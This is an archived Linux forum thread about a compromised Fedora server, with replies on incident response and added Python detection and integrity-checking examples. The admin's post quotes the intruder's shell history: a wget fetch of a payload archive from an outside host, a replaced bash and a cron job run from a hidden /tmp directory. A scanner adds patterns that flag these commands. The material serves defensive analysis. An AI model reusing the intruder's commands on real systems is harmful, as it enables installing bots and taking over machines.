need help with root hack
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125

Posted: Tue Apr 18, 2006 2:45 pm    Post subject: need help with root hack

.... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?

Anyway, I'm running Fedora Core 2, and I found an odd entry in my cron
log:
Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
/.access.log/y2kupdate >/root/what 2>&1)
Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
bytes of output but got status 0x0046 )

So I looked into the /home/testuser and found .bash_history:

ls
wc -l uniq.txt
ls
../eigei 100 &
ps -x
ls
exit
ps -x
exit
w
ps -x
cd //tmp/." ";ls -af
cd w00t;ls
cat vuln.txt
wc -l vuln.txt
ps -x
exit
w
ps -x
cd //tmp/." "/woot;ls
cd //tmp/." "/w00t;ls
cat vuln.txt
mv 0 pscan2;ls
wc -l uniq.txt
../eigei 100 &
exit
w
ps -x
cat //tmp/." "/w00t/vuln.txt
ls //tmp/." "/w00t
exit
w
ps x
kill -9 31257 31256
passwd
/sbin/ifconfig |grep inet
cat /proc/cpuinfo
w
uname -a
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
ls -a
cd /var/tmp
ls -a
mkdir ." "
cd ." "
ls -a
tar zxvf omar.tar.gz
rm -rf omar.tar.gz
cd .f
mv x bash
export PATH="."
bash
w
ps x
ls -a
cat /proc/cpuinfo
ls -
a
ls -a
cd /var/tmp
ls -a
cd ." "
ls -a
cd .f
ls -a
export PATH="."
bash
w
ps x
cat /proc/cpuinfo
w
ps x
cd /var/tmp
ls -a
cd ." "
ls -a
cat /etc/hosts
cat /proc/cpuinfo
ls-a
cd .f
ls -a
export PATH="."
bash
w
ps x
cd /vart/emp
ls -acd /var/tmp
ls -a
cd /var/tmp
ls -a
cat /etc/hosts
ls -a
rm -rf ." "
/sbin/ifconfig -a |grep inet
cat /proc/cpuinfo
ls- a
ls- a
wget archive.lydo.org/omar1.tgz
tar zxvf omar1.tgz
rm -rf omar1.tgz
cd .f
mv x bash
../bash
ps x
kill -9 2591
export PATH="."
bash


And a bunch of stuff above that with various text files.
So I looked at /tmp and found a second "." directory.
[root@fileserve w00t]# pwd
/tmp/. /w00t

and in there is:
[root@fileserve w00t]# ls -al
total 11752
drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
-rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
-rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
-rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
-rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
-rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
-rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
-rwxr-xr-x 1 523 525 121 Apr 21 2003 make
-rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
-rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
-rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
-rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
-rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
-rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
-rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
-rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
-rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
-rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
-rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
-rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c


I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?

Any ideas? This is completely new to me.
Thanks!
-Liam
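A way to triage cron and .bash_history lines like the ones in this post for the indicators it shows (a dot-space "hidden" directory under /tmp or /var/tmp, PATH set to ".", an archive pulled in with wget, a cron job executing from /tmp). This is an added example, not code from the thread; the sample lines are constructed to resemble the post's, and the rule list is my own assumption about what is worth flagging.

```python
import re

# Constructed sample lines modelled on the cron log and .bash_history in the
# post above; they are not taken from any real host.
SAMPLE_CRON = [
    "Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/. /.access.log/y2kupdate >/root/what 2>&1)",
    "Apr 18 10:00:01 fileserve CROND[13900]: (root) CMD (/usr/lib/sa/sa1 1 1)",
]
SAMPLE_HISTORY = [
    "ls",
    'cd //tmp/." ";ls -af',
    "wget archive.lydo.org/omar1.tgz",
    "tar zxvf omar1.tgz",
    'export PATH="."',
    "bash",
    "cat /proc/cpuinfo",
]

# Detection rules (an assumption about what is worth flagging, based on the
# tradecraft visible in this thread): a directory whose name is a dot followed
# by a space under a world-writable temp dir, a PATH that consists only of ".",
# archives fetched onto the box, and cron jobs that execute something living
# under /tmp or /var/tmp.
RULES = [
    ("dot-space hidden dir", re.compile(r'/(?:var/)?tmp/+\.(?:" "|\s)')),
    ("PATH set to cwd only", re.compile(r'\bPATH=["\']?\.["\']?\s*$')),
    ("archive fetched by wget", re.compile(r'\bwget\b.*\.(?:tgz|tar\.gz)\b')),
    ("cron job runs from tmp", re.compile(r'CMD \(/*(?:var/)?tmp/')),
]


def scan(lines, source):
    """Return (source, line_no, rule_name, line) for every rule hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((source, n, name, line.rstrip("\n")))
    return hits


def scan_file(path, source=None):
    """Run the rules over a real file, e.g. /var/log/cron or a user's .bash_history."""
    with open(path, "r", errors="replace") as f:
        return scan(f, source or path)


def summarize(hits):
    """Count hits per rule so a long history can be triaged at a glance."""
    counts = {}
    for _, _, name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    all_hits = scan(SAMPLE_CRON, "cron") + scan(SAMPLE_HISTORY, "history")
    for src, n, name, line in all_hits:
        print(f"{src}:{n}: {name}: {line}")
    print(summarize(all_hits))
```

The rules are deliberately narrow; a history that ends in `export PATH="."` followed by `bash` is the point where, as the next reply notes, the record stops being trustworthy.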
Schraalhans Keukenmeester
*nix forums beginner
Joined: 20 Feb 2005
Posts: 35

Posted: Tue Apr 18, 2006 3:30 pm    Post subject: Re: need help with root hack

news@celticbear.com wrote:
Quote:
... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?

[..snip..]

I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?

Any ideas? This is completely new to me.
Thanks!
-Liam

Don't trust your box anymore. Apparently some program has been installed
to take the place of bash. Hard to tell from here which version you
are using yourself right now. Easy to guess the new Bash does more than
handle your keystrokes for you....

Your (his) bash history stops there, simply because a new bash has taken
over. ASSUME the worst!

Was testuser a user you created before?
What do your firewall rules/policies look like ?
(which) Users allowed to SSh to your machine from remote locations?
What services do you have running at opened ports?

Don't throw the 'evidence' away! Save it in an archive on a cdrom or
diskette and keep that for later analysis. Be glad you FOUND the
evidence, many hacked boxen are only discovered as such much later.
Block the user, kill the WAN connection.

Maybe you can try nmap to see what ports are open on your box to the
outside world. If you want me or someone else to have a look what ports
are open, you could pm someone, or better, use an online service to have
your pc scanned. Better still (as long as you are sure no other hosts on
your LAN are affected), run nmap on those to see what services/ports
your compromised box advertises through the firewall.

chkrootkit and rkhunter (both available as yum-able rpms I believe) can
help spot rootkits on your box.

New setup is advisable, if not mandatory. Someone installing his own
bash surely isn't doing that just to see if he can...

Next install, make sure you use tripwire or AIDE or similar to make a
checksum database of all the relevant stuff on your machine. That way
you at least can easily detect which programs/files have been affected
after a break-in. Be sure to keep the database up-to-date and stored
somewhere safe (i.e. write-once media or external device, floppies, etc
etc.)

HTH
Sh.
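A minimal version of the checksum-database approach recommended above (the job tripwire and AIDE do), added here as an example and not part of the reply: it records a SHA-256 plus mode, owner and size for every file under the chosen roots, stores that as JSON, and reports what was added, removed or changed; demo() simulates the swapped bash from this thread on a throwaway directory. The function names are my own.

```python
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """SHA-256 plus the metadata a binary swap usually disturbs (mode, owner, size)."""
    st = os.lstat(path)
    rec = {"mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid,
           "gid": st.st_gid, "size": st.st_size}
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    elif stat.S_ISLNK(st.st_mode):
        rec["target"] = os.readlink(path)   # a redirected symlink is a change too
    return rec


def build_baseline(roots):
    """Walk each root (e.g. /bin, /sbin, /usr/bin, /etc) and record every file."""
    baseline = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    baseline[path] = file_record(path)
                except OSError:
                    continue            # vanished or unreadable; not fatal
    return baseline


def save_baseline(baseline, db_path):
    # The database must leave the box (write-once media, another host): a
    # baseline kept on the compromised disk can be edited along with the binaries.
    with open(db_path, "w") as f:
        json.dump(baseline, f, sort_keys=True, indent=1)


def load_baseline(db_path):
    with open(db_path) as f:
        return json.load(f)


def compare(old, new):
    """Report paths that appeared, disappeared, or whose record changed."""
    old_keys, new_keys = set(old), set(new)
    return {
        "added": sorted(new_keys - old_keys),
        "removed": sorted(old_keys - new_keys),
        "changed": sorted(p for p in old_keys & new_keys if old[p] != new[p]),
    }


def demo():
    """Constructed walkthrough on a throwaway tree: baseline, then a bash swap and a dropped file."""
    with tempfile.TemporaryDirectory() as d:
        bin_dir = os.path.join(d, "bin")
        os.mkdir(bin_dir)
        for name, body in (("bash", b"#!/bin/sh\necho real bash\n"),
                           ("ls", b"#!/bin/sh\necho ls\n")):
            with open(os.path.join(bin_dir, name), "wb") as f:
                f.write(body)
        db = os.path.join(d, "baseline.json")
        save_baseline(build_baseline([bin_dir]), db)
        # Simulate what this thread describes: bash replaced, a new file dropped.
        with open(os.path.join(bin_dir, "bash"), "wb") as f:
            f.write(b"#!/bin/sh\necho not the real bash\n")
        with open(os.path.join(bin_dir, "x"), "wb") as f:
            f.write(b"dropped\n")
        report = compare(load_baseline(db), build_baseline([bin_dir]))
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(demo())   # {'added': ['x'], 'removed': [], 'changed': ['bash']}
```

The comparison is only as trustworthy as the hashing tool and the kernel it runs on, which is why the reply says to keep the database off the machine and why a rebuild is still the answer once a swap is found.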
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125

Posted: Tue Apr 18, 2006 4:27 pm    Post subject: Re: need help with root hack

Schraalhans Keukenmeester wrote:
Quote:
news@celticbear.com wrote:
... I think that's what happened. Pretty sure. I'm pretty newbie with
Linux security, but the following seems pretty obvious to me.
I guess I could use some suggestions regarding how serious this is, if
it can be fixed/repaired/closed, and ideas of what may have been done.
How the heck did it happen? What can I do to prevent it?
And if I were running Slackware 10.2, would this have been less likely
to happen?

[..snip..]

I removed the user "testuser", and I'm about to remove this dir.
But I guess I kind of need to know how bad the damage is.
Were they able to get root access? Do they likely know all the
passwords?
Would changing the passwords even work, or do they likely have some
kind of keylogger installed?

Any ideas? This is completely new to me.
Thanks!
-Liam

Don't trust your box anymore. Apparently some program has been installed
to take the place of bash. Hard to tell from here which version you
are using yourself right now. Easy to guess the new Bash does more than
handle your keystrokes for you....

Your (his) bash history stops there, simply because a new bash has taken
over. ASSUME the worst!

Yeah, I'm going to rebuild the box. =/
Think Slackware is any more secure out-of-the-box? FC4?

Quote:

Was testuser a user you created before?
What do your firewall rules/policies look like ?
(which) Users allowed to SSh to your machine from remote locations?
What services do you have running at opened ports?


To be honest, I have no recollection of whether I created it or not. If I
did, it probably didn't have a good password.
(*thud*)
I have no idea what my firewall rules look like. =(
I once looked into IPTABLES and it was like having to learn a whole new
language, and not a friendly one either. I just used the built-in
Fedora Core firewall manager and only had ports 22 and 80 open.

Fortunately I do know enough to have in my /etc/sshd_config:
PermitRootLogin no
AllowUsers liam duane

So, that's not a bad thing I guess.
But, how do I check what services I have running on open ports??


Quote:
Don't throw the 'evidence' away!. save it in an archive on a cdrom or
diskette and keep that for later analysis. Be glad you FOUND the
evidence, many hacked boxen are only discovered as such much later.
Block the user, kill the WAN connection.


Yeah, before I removed the testuser home dir and that hidden folder in
tmp, I copied them over to /root so I could look at them.
I'll move them somewhere off the PC.
Now if I could only really understand what it's telling me. =/

Quote:
Maybe you can try nmap to see what ports are open on your box to the
outside world. If you want me or someone else to have a look what ports
are open, you could pm someone, or better, use an online service to have
your pc scanned. Better still (as long as you are sure no other hosts on
your LAN are affected), run nmap on those to see what services/ports
your compromised box advertises through the firewall.


Uhm, OK. I used grc.com's ShieldsUp
and according to it, only 22 and 80 are open to the outside. All else
is "stealthed."
I'll see what I can do about nmap from the outside.

Quote:
chkrootkit and rkhunter (both available as yum-able rpms I believe) can
help spot rootkits on your box.


Well, I ran chkrootkit and got this:
a LOT of entries labeled "not infected" and the like, and then...

Checking `chkutmp'... The tty of the following user process(es) were
not found in /var/run/utmp !
! RUID PID TTY CMD
! root 3128 tty4 /sbin/mingetty tty4
! root 3134 tty5 /sbin/mingetty tty5
! root 3140 tty6 /sbin/mingetty tty6
chkutmp: nothing deleted
[root@fileserve chkrootkit-0.46a]# ./chkrootkit ps ls sniffer
ROOTDIR is `/'
Checking `ps'... not infected
Checking `ls'... not infected
Checking `sniffer'... eth0: PF_PACKET(/usr/local/bin/snort)

I don't understand the tty thing. Is that good or bad?

rkhunter (these are cool programs!) and it came up with:
[..]
* Application version scan
- GnuPG 1.2.4 [ OK ]
- Apache 2.0.51 [ Old or patched version ]
- Bind DNS 9.2.3 [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 4.3.10 [ Old or patched version ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.6.1p2 [ Old or patched version ]
[..]
---------------------------- Scan results ----------------------------

MD5
MD5 compared: 49
Incorrect MD5 checksums: 0

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 4

Now, you mentioned bash was replaced... that didn't seem to detect
that. Yikes. =(


Quote:
New setup is advisable, if not mandatory. Someone installing his own
bash surely isn't doing that just to see if he can...

Next install, make sure you use tripwire or AIDE or similar to make a
checksum database of all the relevant stuff on your machine. That way
you at least can easily detect which programs/files have been affected
after a break-in. Be sure to keep the database up-to-date and stored
somewhere safe (i.e. write-once media or external device, floppies, etc
etc.)


I'm looking into tripwire for the new install.
Still I wonder, which will be the more useful and secure for the Linux
security newbie like me. FC 4 or Slackware 10.2.
=/

Thanks for all the help! This is a lot of great advice and
information!!

BTW, I ran chkrootkit on another server in a different WAN, and got:

[root@s75712 chkrootkit-0.46a]# ./chkrootkit -q
warning, got duplicate tcp line.
warning, got duplicate tcp line.

/usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/Image/Magick/.packlist
/usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist
/usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/auto/mod_perl/.packlist

warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
warning, got duplicate tcp line.
INFECTED (PORTS: 31337)

What can you tell me about these findings?
What is a duplicate TCP line? And more importantly, how can I find out
what's going on with port 31337! ("elite." Cute. Not.)

THANKS!!
-Liam
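For the two questions in this post, which services are listening on open ports and what is behind port 31337, this added example (not from the thread) reads the kernel's /proc/net/tcp table the way netstat does: it decodes the hex address:port pairs, keeps sockets in LISTEN state, and maps a socket inode to the owning PID through /proc/<pid>/fd. The embedded table is constructed for the demo; on a live box the script reads the real /proc/net/tcp.

```python
import os
import socket
import struct

# Constructed /proc/net/tcp excerpt, not taken from the poster's machine:
# listeners on 22 and 80 (the two ports the post says are open), a listener
# on 31337 (0x7A69) owned by uid 500, and one established client connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5123 1 00000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5210 1 00000000 100 0 0 10 0
   2: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000   500        0 9981 1 00000000 100 0 0 10 0
   3: 0100007F:0050 0100007F:C1A2 01 00000000:00000000 00:00000000 00000000     0        0 9990 1 00000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"   # socket state codes in /proc/net/tcp are hex; 0A is LISTEN


def decode_addr(hexaddr):
    """'0100007F:0050' -> ('127.0.0.1', 80); the kernel prints IPv4 little-endian."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(text):
    """Return [(ip, port, uid, inode)] for every LISTEN socket, sorted by port."""
    listeners = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        listeners.append((ip, port, int(fields[7]), int(fields[9])))
    return sorted(listeners, key=lambda t: t[1])


def unexpected_listeners(text, allowed_ports):
    """Listeners outside the set the admin expects (22 and 80 in this thread)."""
    return [l for l in parse_listeners(text) if l[1] not in allowed_ports]


def pids_for_inode(inode, proc="/proc"):
    """Map a socket inode to owning PIDs by reading /proc/<pid>/fd links (root sees all)."""
    target = f"socket:[{inode}]"
    pids = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:
            continue                             # process gone, or not ours to read
        if target in links:
            pids.append(int(pid))
    return pids


if __name__ == "__main__":
    # Use the live table when available, otherwise the constructed sample.
    try:
        with open("/proc/net/tcp") as f:
            table = f.read()
    except OSError:
        table = SAMPLE_PROC_NET_TCP
    for ip, port, uid, inode in unexpected_listeners(table, {22, 80}):
        print(f"{ip}:{port} uid={uid} inode={inode} pids={pids_for_inode(inode)}")
```

Reading /proc directly sidesteps a trojaned netstat or ps binary, but not a kernel module that filters /proc, so an empty result is not proof of a clean box; the matching UDP and IPv6 tables are /proc/net/udp and /proc/net/tcp6.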
stan@worldbadminton.com
*nix forums beginner
Joined: 06 Oct 2005
Posts: 10

Posted: Tue Apr 18, 2006 4:42 pm    Post subject: Re: need help with root hack

In comp.os.linux.misc news@celticbear.com <news@celticbear.com> wrote:

: Schraalhans Keukenmeester wrote:
:> over. ASSUME the worst!

: Yeah, I'm going to rebuild the box. =/
: Think Slackware is any more secure out-of-the-box? FC4?

Any of the major releases will be plenty secure IF you
(1) set up security properly in the first place- including
shutting down all access except what you really need,
leaving good firewall in place, never running as root, etc.

(2) very regularly download and install all security updates.

An external firewall ( like a dedicated firewall box )
is an extra layer that can help a bunch.

As with any security nothing will be 100% protection from the
really determined hacker short of eliminating all network
access, but the casual hacker will be very well stopped
by normal security.

Stan

--
Stan Bischof ("stan" at the below domain)
www.worldbadminton.com
Ben@atomnet.co.uk
*nix forums beginner
Joined: 18 Apr 2006
Posts: 1

Posted: Tue Apr 18, 2006 5:26 pm    Post subject: Re: need help with root hack

I took a look at the file they downloaded/extracted/installed onto your
machine. It's an IRC Bot, probably used for advertising/flooding, etc.
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125

Posted: Tue Apr 18, 2006 6:23 pm    Post subject: Re: need help with root hack

stan@worldbadminton.com wrote:
Quote:
In comp.os.linux.misc news@celticbear.com <news@celticbear.com> wrote:

: Schraalhans Keukenmeester wrote:
:> over. ASSUME the worst!

: Yeah, I'm going to rebuild the box. =/
: Think Slackware is any more secure out-of-the-box? FC4?

Any of the major releases will be plenty secure IF you
(1) set up security properly in the first place- including
shutting down all access except what you really need,
leaving good firewall in place, never running as root, etc.

(2) very regularly download and install all security updates.

An external firewall ( like a dedicated firewall box )
is an extra layer that can help a bunch.

As with any security nothing will be 100% protection from the
really determined hacker short of eliminating all network
access, but the casual hacker will be very well stopped
by normal security.


Thanks for the reply!
Someone else said "security is a process, not an application." I'm
taking that to heart.
I do have an IP-Cop box between the 'net and the compromised machine,
but it was in the DMZ with port 80 forwarded to it.

I've decided to go with Slackware because it's more efficient out of the
box, and it's going to force me to learn more about security rather
than allowing me to rely on pre-packaged stuff from RedHat.

Thanks for the feedback!
-Liam
news@celticbear.com
*nix forums Guru Wannabe
Joined: 16 May 2005
Posts: 125

Posted: Tue Apr 18, 2006 6:25 pm    Post subject: Re: need help with root hack

Ben@atomnet.co.uk wrote:
Quote:
I took a look at the file they downloaded/extracted/installed onto your
machine. It's an IRC Bot, probably used for advertising/flooding, etc.

Thanks for the reply!
That's kind of what I was thinking, but couldn't be sure.
Someone else confirmed my own suspicions that because so much evidence
was left behind and not much care to clean up after themselves, it was
likely a scriptkiddie who was only interested in installing spam
software, and not really interested or knowledgeable about gaining root
access and controlling the box.

I'm going to rebuild it anyway, of course.
Thanks again!
-Liam
Bill Davidsen
*nix forums Guru Wannabe
Joined: 22 Mar 2005
Posts: 217

Posted: Fri Apr 21, 2006 6:43 pm    Post subject: Re: need help with root hack

Quote:
Thanks for the reply!
Someone else said "security is a process, not an application." I'm
taking that to heart.
I do have an IP-Cop box between the 'net and the compromised machine,
but it was in the DMZ with port 80 forwarded to it.

I've decided to go with Slackware because of more efficient out of the
box, and it's going to force me to learn more about security rather
than allowing me to rely on pre-packaged stuff from RedHat.

You need to define your use and goals before selecting a distribution.
If you really want secure, something like CentOS is good, because it's
based on the RHEL top of the line commercial Linux, and very stable.
Security releases come out quickly. If you want good security and more
cutting edge than a stable release, I would go FC4 (or FC5 for more
cutting edge and less experience from users).

I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.

It's nice to learn about firewalls and roll your own, but right now you
are learning by doing post mortem after being hacked. It's a great way
to learn if you don't mind the "being hacked" part. I would suggest that
a firewall built by a distribution program is likely to work better than
what you are likely to write at the moment.

If you really want security, running virtual machines with xen or
similar is a learning path.

--
-bill davidsen (davidsen@tmr.com)
"The secret to procrastination is to put things off until the
last possible moment - but no longer" -me
Lawrence D'Oliveiro
*nix forums Guru
Joined: 25 Mar 2005
Posts: 723

Posted: Sat Apr 22, 2006 8:49 am    Post subject: Re: need help with root hack

In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:

Quote:
I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.

Don't rely on security-through-obscurity.
Stachu 'Dozzie' K.
*nix forums Guru Wannabe
Joined: 30 Mar 2005
Posts: 250

Posted: Sat Apr 22, 2006 2:30 pm    Post subject: Re: need help with root hack

On 22.04.2006, Lawrence D'Oliveiro <ldo@geek-central.gen.new_zealand> wrote:
Quote:
In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:

I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.

Don't rely on security-through-obscurity.

It's not for security, I think. It's just for keeping logs clear :)

--
Feel free to correct my English
Stanislaw Klekot
Matt_left_coast
*nix forums Guru
Joined: 20 Feb 2005
Posts: 831

Posted: Sat Apr 22, 2006 3:48 pm    Post subject: Re: need help with root hack

Lawrence D'Oliveiro wrote:

Quote:
In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:

I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.

Don't rely on security-through-obscurity.

Port-knocking is not "security-through-obscurity" any more than a
combination lock is "security-through-obscurity". If the need is to allow
connections from "random IPs", it is FAR, FAR better than just leaving the
port open to the world (on any port).
Lawrence D'Oliveiro
*nix forums Guru
Joined: 25 Mar 2005
Posts: 723

Posted: Mon Apr 24, 2006 4:29 am    Post subject: Re: need help with root hack

In article <1212659.HCNjaZ3pTA@rcn.com>,
matt_left_coast <not@chance.org> wrote:

Quote:
Lawrence D'Oliveiro wrote:

In article <aJ92g.4242$mu2.2227@newssvr24.news.prodigy.net>,
Bill Davidsen <davidsen@tmr.com> wrote:

I would NOT run ssh on the standard port unless you can be sure that
packets will come from known addresses. If you must allow access from
random IPs, pick a non-standard port and do a search on "port knocking"
to secure it.

Don't rely on security-through-obscurity.

Port-knocking is not "security-through-obscurity" any more than a
combination lock is "security-through-obscurity".

Wrong analogy.

The right analogy would be a "secret knock" that you _hope_ nobody else
is listening to.
Copyright © 2004-2005 DeniX Solutions SRL